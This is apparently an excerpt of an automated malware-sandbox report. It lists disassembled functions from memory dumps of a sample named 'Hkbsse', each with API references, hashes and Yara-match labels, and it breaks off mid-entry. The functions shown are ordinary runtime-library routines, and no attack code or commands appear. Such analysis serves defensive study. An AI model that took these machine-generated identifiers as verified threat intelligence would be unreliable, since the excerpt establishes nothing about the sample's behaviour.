                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
                    • String ID:
                    • API String ID: 1206951868-0
                    • Opcode ID: fd94452bb283925db15eed2e4757c18caa3077711e278af8bdb9b3e6b693ea09
                    • Instruction ID: d577beb8d5f7a25a246786298edb7ccd40021a426b32c7a5d3bb39dee0a6c7ef
                    • Opcode Fuzzy Hash: fd94452bb283925db15eed2e4757c18caa3077711e278af8bdb9b3e6b693ea09
                    • Instruction Fuzzy Hash: A7413A75900704AFDF249FA6DC459EFBBF9EF88300B10552EE896D3610EA30A941CBB1
                    Function 0042DC41 Relevance: 7.6, APIs: 5, Instructions: 123COMMON
                    Download Yara Rule
                    APIs
                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0042DC75
                      • Part of subcall function 0042903F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00429060
                    • Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 0042DCD4
                    • Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 0042DCFA
                    • Concurrency::details::SchedulerBase::ReleaseInternalContext.LIBCONCRT ref: 0042DD1A
                    • Concurrency::location::_Assign.LIBCMT ref: 0042DD67
                      • Part of subcall function 00431440: Concurrency::details::ContextBase::AddStealer.LIBCONCRT ref: 00431485
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Context$Base::Concurrency::details::$Internal$Event$AssignBlockingConcurrency::location::_FindNestingPrepareReleaseSchedulerStealerThrowTraceWork
                    • String ID:
                    • API String ID: 1879022333-0
                    • Opcode ID: 5aea100d1611f03f1beea5e0fb550c94f5de7610d73f87ec00ff82fe4494aade
                    • Instruction ID: 63ebb2224078d8bdd719b4d667a60a5c8aa541c12ffbf131e152555adb9a5383
                    • Opcode Fuzzy Hash: 5aea100d1611f03f1beea5e0fb550c94f5de7610d73f87ec00ff82fe4494aade
                    • Instruction Fuzzy Hash: 464126B0B00220ABDF19AB25E886BFEBB64AF45314F44409FE4065B382CF789D45C7D9
                    Function 0449F05D Relevance: 7.6, APIs: 5, Instructions: 101COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • __EH_prolog3_GS.LIBCMT ref: 0449F064
                    • Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 0449F08E
                      • Part of subcall function 0449F754: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 0449F771
                    • Concurrency::details::EventWaitNode::Satisfy.LIBCONCRT ref: 0449F10B
                    • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0449F13D
                    • __freea.LIBCMT ref: 0449F163
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::_Lock::_Scoped_lock$Acquire_lockConcurrency::critical_section::_Concurrency::details::EventH_prolog3_Node::ReaderReentrantSatisfyScoped_lock::_Scoped_lock::~_WaitWriter__freea
                    • String ID:
                    • API String ID: 2497068736-0
                    • Opcode ID: 64bc477ca6d0e7906eca2e494a79156161fd0f552174310835e686a0cf1359d2
                    • Instruction ID: c803ebc2acb9b68a54f1c1ed7ea5fa91d2e7e81e75593434c22ac7734d66df84
                    • Opcode Fuzzy Hash: 64bc477ca6d0e7906eca2e494a79156161fd0f552174310835e686a0cf1359d2
                    • Instruction Fuzzy Hash: 28317E71A002069BDF14DFA8C8416AEBBF9AF49314F25406FD505E7381DB74AD0ADB94
                    Function 004287D9 Relevance: 7.6, APIs: 5, Instructions: 88COMMON
                    Download Yara Rule
                    APIs
                    • _SpinWait.LIBCONCRT ref: 004287FE
                      • Part of subcall function 0041EBE0: _SpinWait.LIBCONCRT ref: 0041EBF8
                    • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 00428812
                    • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00428844
                    • List.LIBCMT ref: 004288C7
                    • List.LIBCMT ref: 004288D6
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                    • String ID:
                    • API String ID: 3281396844-0
                    • Opcode ID: d3379cffcb3624c0f7b3b6030f0d212e7c0603c93dc2e1288b36c8e06a519342
                    • Instruction ID: 2a559f85231c331ddd4a9ce77051960e3928693ad3a01cc98d84397cd5210c7c
                    • Opcode Fuzzy Hash: d3379cffcb3624c0f7b3b6030f0d212e7c0603c93dc2e1288b36c8e06a519342
                    • Instruction Fuzzy Hash: 42318A32E02625DFCB14EFA5E5516EDB7B0BF14308F84406FD80127242DB396D04CB99
                    Function 044A76DB Relevance: 7.6, APIs: 5, Instructions: 80COMMON
                    Download Yara Rule
                    APIs
                    • Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 044A7727
                    • Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 044A7769
                    • Concurrency::details::InternalContextBase::GetAndResetOversubscribedVProc.LIBCMT ref: 044A7785
                    • Concurrency::details::VirtualProcessor::MarkForRetirement.LIBCONCRT ref: 044A7790
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 044A77B7
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Virtual$FindMatchingNode::ProcessorScheduling$Base::ContextInternalMarkOversubscribedProcProcessor::ResetRetirementstd::invalid_argument::invalid_argument
                    • String ID:
                    • API String ID: 3897347962-0
                    • Opcode ID: 18d1e6f5588df1a187ef86af0e02b332a0a908ae4d907c5c7b9a669127731062
                    • Instruction ID: 9ec6f312166188fe342cbd2480aa4b30f5cf8d8db02a0fce7c49296492e5b494
                    • Opcode Fuzzy Hash: 18d1e6f5588df1a187ef86af0e02b332a0a908ae4d907c5c7b9a669127731062
                    • Instruction Fuzzy Hash: D0219438A00208AFDF14EF65C584AAE7BB5BF14358F1440AAD901973A1DB34FE15CF90
                    Function 0043F0DD Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • _free.LIBCMT ref: 0043F0F5
                      • Part of subcall function 0043AE95: HeapFree.KERNEL32(00000000,00000000,?,0043F170,?,00000000,?,?,?,0043F197,?,00000007,?,?,0043F599,?), ref: 0043AEAB
                      • Part of subcall function 0043AE95: GetLastError.KERNEL32(?,?,0043F170,?,00000000,?,?,?,0043F197,?,00000007,?,?,0043F599,?,?), ref: 0043AEBD
                    • _free.LIBCMT ref: 0043F107
                    • _free.LIBCMT ref: 0043F119
                    • _free.LIBCMT ref: 0043F12B
                    • _free.LIBCMT ref: 0043F13D
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: b7a06467977bbac8cfd489c50f4a7d094a08230f1997383846fcfae6058d8918
                    • Instruction ID: 20cc99717a647c86e6a84bdeed4021dc3f5e7d0ecd55b80566e61f4c1914feb2
                    • Opcode Fuzzy Hash: b7a06467977bbac8cfd489c50f4a7d094a08230f1997383846fcfae6058d8918
                    • Instruction Fuzzy Hash: EBF04432944710ABC925EB55FA82C0B73E9EA48314F68282FF058D7601DB7CFC44466D
                    Function 044BF344 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • _free.LIBCMT ref: 044BF35C
                      • Part of subcall function 044BB0FC: HeapFree.KERNEL32(00000000,00000000,?,044BF3D7,?,00000000,?,?,?,044BF3FE,?,00000007,?,?,044BF800,?), ref: 044BB112
                      • Part of subcall function 044BB0FC: GetLastError.KERNEL32(?,?,044BF3D7,?,00000000,?,?,?,044BF3FE,?,00000007,?,?,044BF800,?,?), ref: 044BB124
                    • _free.LIBCMT ref: 044BF36E
                    • _free.LIBCMT ref: 044BF380
                    • _free.LIBCMT ref: 044BF392
                    • _free.LIBCMT ref: 044BF3A4
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: b7a06467977bbac8cfd489c50f4a7d094a08230f1997383846fcfae6058d8918
                    • Instruction ID: c9980ef2693cb12544958a55a59c183edd96113da92e0ce41ca0cf1d8edbfc7d
                    • Opcode Fuzzy Hash: b7a06467977bbac8cfd489c50f4a7d094a08230f1997383846fcfae6058d8918
                    • Instruction Fuzzy Hash: 11F04F32604B00FB9E30EB5AEA81C9B73D9EB00315754580AE09CD7A20CFB0F88086B4
                    Function 00402670 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 207COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • ___std_exception_copy.LIBVCRUNTIME ref: 00402806
                    • ___std_exception_destroy.LIBVCRUNTIME ref: 004028A0
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: ___std_exception_copy___std_exception_destroy
                    • String ID: P#@$P#@
                    • API String ID: 2970364248-3974838576
                    • Opcode ID: 04bb84ff4b4bae0cfb47b6af8ba6911b054a7e0b36e17a04bde3e3e5af0a576f
                    • Instruction ID: d07b1476e1c9369c34cdbbae878fc5af4d4488366f6001985d65a31c5cb34ac4
                    • Opcode Fuzzy Hash: 04bb84ff4b4bae0cfb47b6af8ba6911b054a7e0b36e17a04bde3e3e5af0a576f
                    • Instruction Fuzzy Hash: D4719471E002089BDB04DF98C985BDDFBB4EF49314F14822EE815B7381D778A984CBA9
                    Function 0043DAC1 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID: *?
                    • API String ID: 269201875-2564092906
                    • Opcode ID: e5011a25309ae06755606b4eb0abf58eb485cfb5f4646edeaebc0172359cf34e
                    • Instruction ID: a3f27f88263ce3e1505ace8c85f3ecc3a08bb576eb7af5fa0352c1f383531ab9
                    • Opcode Fuzzy Hash: e5011a25309ae06755606b4eb0abf58eb485cfb5f4646edeaebc0172359cf34e
                    • Instruction Fuzzy Hash: D4617BB1E002199FDB14CFA9D8815AEFBF5EF4C310F2591AAE805E7300D678AE418B94
                    Function 044BDD28 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID: *?
                    • API String ID: 269201875-2564092906
                    • Opcode ID: e5011a25309ae06755606b4eb0abf58eb485cfb5f4646edeaebc0172359cf34e
                    • Instruction ID: 04b6ccf11bd173ae16ac29a83a70894d7adb7a498232175ba1018adbcfea1511
                    • Opcode Fuzzy Hash: e5011a25309ae06755606b4eb0abf58eb485cfb5f4646edeaebc0172359cf34e
                    • Instruction Fuzzy Hash: FA613EB5E006199FDF24CFA9C8805EEFBF5EF48314B1581AAD895E7300D675AE418BA0
                    Function 00442792 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 171timeCOMMON
                    Download Yara Rule
                    APIs
                    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00456758), ref: 004427FC
                    • _free.LIBCMT ref: 004427EA
                      • Part of subcall function 0043AE95: HeapFree.KERNEL32(00000000,00000000,?,0043F170,?,00000000,?,?,?,0043F197,?,00000007,?,?,0043F599,?), ref: 0043AEAB
                      • Part of subcall function 0043AE95: GetLastError.KERNEL32(?,?,0043F170,?,00000000,?,?,?,0043F197,?,00000007,?,?,0043F599,?,?), ref: 0043AEBD
                    • _free.LIBCMT ref: 004429B6
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapInformationLastTimeZone
                    • String ID: XgE
                    • API String ID: 2155170405-2984570469
                    • Opcode ID: e6cff1b96d69b7330679c385eca8d8e9d46b42b402a043d23bc39838db8e0328
                    • Instruction ID: 4144492f74be2ab261ac73441af81b9bed5bd636e8574888bf5b0065352f6d8b
                    • Opcode Fuzzy Hash: e6cff1b96d69b7330679c385eca8d8e9d46b42b402a043d23bc39838db8e0328
                    • Instruction Fuzzy Hash: 5F512971D00215ABEB10FF668E819AE77BCAF44354F5102AFF510E3291EBF89E418B59
                    Function 0043576C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00435791
                    • CatchIt.LIBVCRUNTIME ref: 00435877
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: CatchEncodePointer
                    • String ID: MOC$RCC
                    • API String ID: 1435073870-2084237596
                    • Opcode ID: 4632558cc9321f54eab00938dad1157866a20dbf75bad7f9ddfe9ee287866398
                    • Instruction ID: f89fec4cce6058aad9e99e0a1a778d616f5fcef55721b1fb97097d1a833b2b70
                    • Opcode Fuzzy Hash: 4632558cc9321f54eab00938dad1157866a20dbf75bad7f9ddfe9ee287866398
                    • Instruction Fuzzy Hash: C9417C71900609EFCF19EF94CD81AEEBBB5FF48304F14905AF90567251D3399A60DB94
                    Function 00403A80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 109COMMON
                    Download Yara Rule
                    APIs
                    • __Mtx_destroy_in_situ.LIBCPMT ref: 00403B53
                    • __Cnd_destroy_in_situ.LIBCPMT ref: 00403B59
                    • __Mtx_destroy_in_situ.LIBCPMT ref: 00403B62
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Mtx_destroy_in_situ$Cnd_destroy_in_situ
                    • String ID: pB@
                    • API String ID: 3308344742-522444117
                    • Opcode ID: 08c114375f5cdfcca0cd6b1a8b7b910a1d641b5675fb53afd59ab823612154f1
                    • Instruction ID: 9fa57e067fa2e57eae0d05727bcb9931675f6d872009e7436c3174976e3d59b0
                    • Opcode Fuzzy Hash: 08c114375f5cdfcca0cd6b1a8b7b910a1d641b5675fb53afd59ab823612154f1
                    • Instruction Fuzzy Hash: 1F31E571600B009FD7248F29C889B66BBE9EF44725F04466EE95ACB391D73CED00CB94
                    Function 0042AF75 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON
                    Download Yara Rule
                    APIs
                    • List.LIBCONCRT ref: 0042AFFA
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042B01F
                    • Concurrency::details::FreeVirtualProcessorRoot::FreeVirtualProcessorRoot.LIBCONCRT ref: 0042B05E
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: FreeProcessorVirtual$Concurrency::details::ListRootRoot::std::invalid_argument::invalid_argument
                    • String ID: pExecutionResource
                    • API String ID: 1772865662-359481074
                    • Opcode ID: 97894c26e78649899b86c153b2f2f2c3430a5959f8272080c60c93d73f9dd151
                    • Instruction ID: b773aba9d63d3202b0a560684f2aba75f81d395c910e5e66aad4bd489bcccfa2
                    • Opcode Fuzzy Hash: 97894c26e78649899b86c153b2f2f2c3430a5959f8272080c60c93d73f9dd151
                    • Instruction Fuzzy Hash: 5F21B9B5B402159BCB08EF65C881BED77A1BF48304F50402FF90567392DBB8AE45CB99
                    Function 00444FE7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58COMMON
                    Download Yara Rule
                    APIs
                    • SetEnvironmentVariableW.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 00445052
                    • _free.LIBCMT ref: 00445061
                    • _free.LIBCMT ref: 00445070
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$EnvironmentVariable
                    • String ID: +C
                    • API String ID: 1464849758-2392048020
                    • Opcode ID: f677b73a37d78ac646d0ce1cbfd6812df92f093aa3150c3488a8ffb32704bfce
                    • Instruction ID: baffdb16212c9a535461b980e853fd56a9b8a88738fd2a4de881e2530209dff9
                    • Opcode Fuzzy Hash: f677b73a37d78ac646d0ce1cbfd6812df92f093aa3150c3488a8ffb32704bfce
                    • Instruction Fuzzy Hash: 411130B1C01219AFDF11AFAA98816DEFFB8BF08314F54406FE414B2212D6384945CBA8
                    Function 00424A4D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54COMMON
                    Download Yara Rule
                    APIs
                    • Concurrency::details::SchedulerBase::Cleanup.LIBCONCRT ref: 00424A7E
                      • Part of subcall function 0042533F: Concurrency::details::SchedulingNode::~SchedulingNode.LIBCONCRT ref: 00425359
                      • Part of subcall function 0042533F: Concurrency::details::_NonReentrantLock::_Acquire.LIBCONCRT ref: 004277D7
                      • Part of subcall function 0042533F: Concurrency::details::_UnregisterConcRTEventTracing.LIBCONCRT ref: 004277E9
                      • Part of subcall function 0042533F: InterlockedPopEntrySList.KERNEL32(00465B38,00000004,00448B40,000000FF), ref: 004277FF
                      • Part of subcall function 0041F517: DeleteCriticalSection.KERNEL32(?,0042BCC1,13877BC0,00000000,?,?,00000000,0044B50B,000000FF,?,0042069C), ref: 0041F518
                    • ~ListArray.LIBCONCRT ref: 00424AC0
                      • Part of subcall function 0042491B: InterlockedFlushSList.KERNEL32(?,?,?,00424AC5,13877BC0,?,?,?,00448B40,000000FF), ref: 00424920
                      • Part of subcall function 0042491B: ListArray.LIBCONCRT ref: 00424929
                      • Part of subcall function 0042491B: InterlockedFlushSList.KERNEL32(?,00000000,?,?,00424AC5,13877BC0,?,?,?,00448B40,000000FF), ref: 00424932
                      • Part of subcall function 0042491B: ListArray.LIBCONCRT ref: 0042493B
                      • Part of subcall function 0042491B: ListArray.LIBCONCRT ref: 00424945
                    • ~ListArray.LIBCONCRT ref: 00424AC8
                      • Part of subcall function 00424995: InterlockedFlushSList.KERNEL32(?,?,?,00424ACD,13877BC0,?,?,?,00448B40,000000FF), ref: 0042499A
                      • Part of subcall function 00424995: ListArray.LIBCONCRT ref: 004249A3
                      • Part of subcall function 00424995: InterlockedFlushSList.KERNEL32(?,00000000,?,?,00424ACD,13877BC0,?,?,?,00448B40,000000FF), ref: 004249AC
                      • Part of subcall function 00424995: ListArray.LIBCONCRT ref: 004249B5
                      • Part of subcall function 00424995: ListArray.LIBCONCRT ref: 004249BF
                      • Part of subcall function 00424995: _InternalDeleteHelper.LIBCONCRT ref: 004249D8
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: List$Array$Interlocked$Flush$Concurrency::details::Concurrency::details::_DeleteScheduling$AcquireBase::CleanupConcCriticalEntryEventHelperInternalLock::_NodeNode::~ReentrantSchedulerSectionTracingUnregister
                    • String ID: LB
                    • API String ID: 3638618822-539997225
                    • Opcode ID: 2c5bffe565fc1a589e524a320b064d675ffc6f65a44ddfca8fe6eaf759df9dd3
                    • Instruction ID: bf305711c351f3dadb84e76d88fdd0194d9a71be08566a7c9c65e0dd41fe3e85
                    • Opcode Fuzzy Hash: 2c5bffe565fc1a589e524a320b064d675ffc6f65a44ddfca8fe6eaf759df9dd3
                    • Instruction Fuzzy Hash: 98116071600911AFC708EB26EC02AD9F360FF54718F80412FE516539A2EF787955CA8C
                    Function 00424A52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53COMMON
                    Download Yara Rule
                    APIs
                    • Concurrency::details::SchedulerBase::Cleanup.LIBCONCRT ref: 00424A7E
                      • Part of subcall function 0042533F: Concurrency::details::SchedulingNode::~SchedulingNode.LIBCONCRT ref: 00425359
                      • Part of subcall function 0042533F: Concurrency::details::_NonReentrantLock::_Acquire.LIBCONCRT ref: 004277D7
                      • Part of subcall function 0042533F: Concurrency::details::_UnregisterConcRTEventTracing.LIBCONCRT ref: 004277E9
                      • Part of subcall function 0042533F: InterlockedPopEntrySList.KERNEL32(00465B38,00000004,00448B40,000000FF), ref: 004277FF
                      • Part of subcall function 0041F517: DeleteCriticalSection.KERNEL32(?,0042BCC1,13877BC0,00000000,?,?,00000000,0044B50B,000000FF,?,0042069C), ref: 0041F518
                    • ~ListArray.LIBCONCRT ref: 00424AC0
                      • Part of subcall function 0042491B: InterlockedFlushSList.KERNEL32(?,?,?,00424AC5,13877BC0,?,?,?,00448B40,000000FF), ref: 00424920
                      • Part of subcall function 0042491B: ListArray.LIBCONCRT ref: 00424929
                      • Part of subcall function 0042491B: InterlockedFlushSList.KERNEL32(?,00000000,?,?,00424AC5,13877BC0,?,?,?,00448B40,000000FF), ref: 00424932
                      • Part of subcall function 0042491B: ListArray.LIBCONCRT ref: 0042493B
                      • Part of subcall function 0042491B: ListArray.LIBCONCRT ref: 00424945
                    • ~ListArray.LIBCONCRT ref: 00424AC8
                      • Part of subcall function 00424995: InterlockedFlushSList.KERNEL32(?,?,?,00424ACD,13877BC0,?,?,?,00448B40,000000FF), ref: 0042499A
                      • Part of subcall function 00424995: ListArray.LIBCONCRT ref: 004249A3
                      • Part of subcall function 00424995: InterlockedFlushSList.KERNEL32(?,00000000,?,?,00424ACD,13877BC0,?,?,?,00448B40,000000FF), ref: 004249AC
                      • Part of subcall function 00424995: ListArray.LIBCONCRT ref: 004249B5
                      • Part of subcall function 00424995: ListArray.LIBCONCRT ref: 004249BF
                      • Part of subcall function 00424995: _InternalDeleteHelper.LIBCONCRT ref: 004249D8
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: List$Array$Interlocked$Flush$Concurrency::details::Concurrency::details::_DeleteScheduling$AcquireBase::CleanupConcCriticalEntryEventHelperInternalLock::_NodeNode::~ReentrantSchedulerSectionTracingUnregister
                    • String ID: LB
                    • API String ID: 3638618822-539997225
                    • Opcode ID: ae0471225621b25c0567817870b227a74b1c6a1860987c812b59f16e11b982c9
                    • Instruction ID: 20409b734b108c2c2fdfc696bb707ba8dd51a7162063a93118c7aaaaa135de39
                    • Opcode Fuzzy Hash: ae0471225621b25c0567817870b227a74b1c6a1860987c812b59f16e11b982c9
                    • Instruction Fuzzy Hash: B0118271600911AFC708EB26EC02AD9F360FF54718F80412FE516439A2EF787955CA8C
                    Function 0042A1FE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35threadCOMMON
                    Download Yara Rule
                    APIs
                    • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0042A212
                    • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0042A236
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042A249
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Resource$Concurrency::details::Execution$CurrentManager::Proxy::RemoveSchedulerThreadstd::invalid_argument::invalid_argument
                    • String ID: pScheduler
                    • API String ID: 246774199-923244539
                    • Opcode ID: db1abe11a5b6d728c40cbcf3526037f91d143974519c1bd9b24ca0c0f7484b45
                    • Instruction ID: 1c324d8570b02ec0d7fbee642b19b31dd6212496db4bd76d71850650a4a55e5c
                    • Opcode Fuzzy Hash: db1abe11a5b6d728c40cbcf3526037f91d143974519c1bd9b24ca0c0f7484b45
                    • Instruction Fuzzy Hash: 23F02B35B00224E7C324FA41F84295EB3759F907157A0445FED0127682DF7D9A09C6AA
                    Function 0041FF2A Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29registryCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • RegisterWaitForSingleObject.KERNEL32(?,6C,?,00430B36,000000FF,0000000C), ref: 0041FF41
                    • GetLastError.KERNEL32(?,00430B36,?,00430A36,?,?,?,?,?,?,00425DBE,?), ref: 0041FF50
                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041FF66
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorLastObjectRegisterSingleWait
                    • String ID: 6C
                    • API String ID: 2296417588-3399334032
                    • Opcode ID: a40a85c5dcb6aacf0f9e8b950b466561b2e947c1d08a488efca2b9012bf6bc28
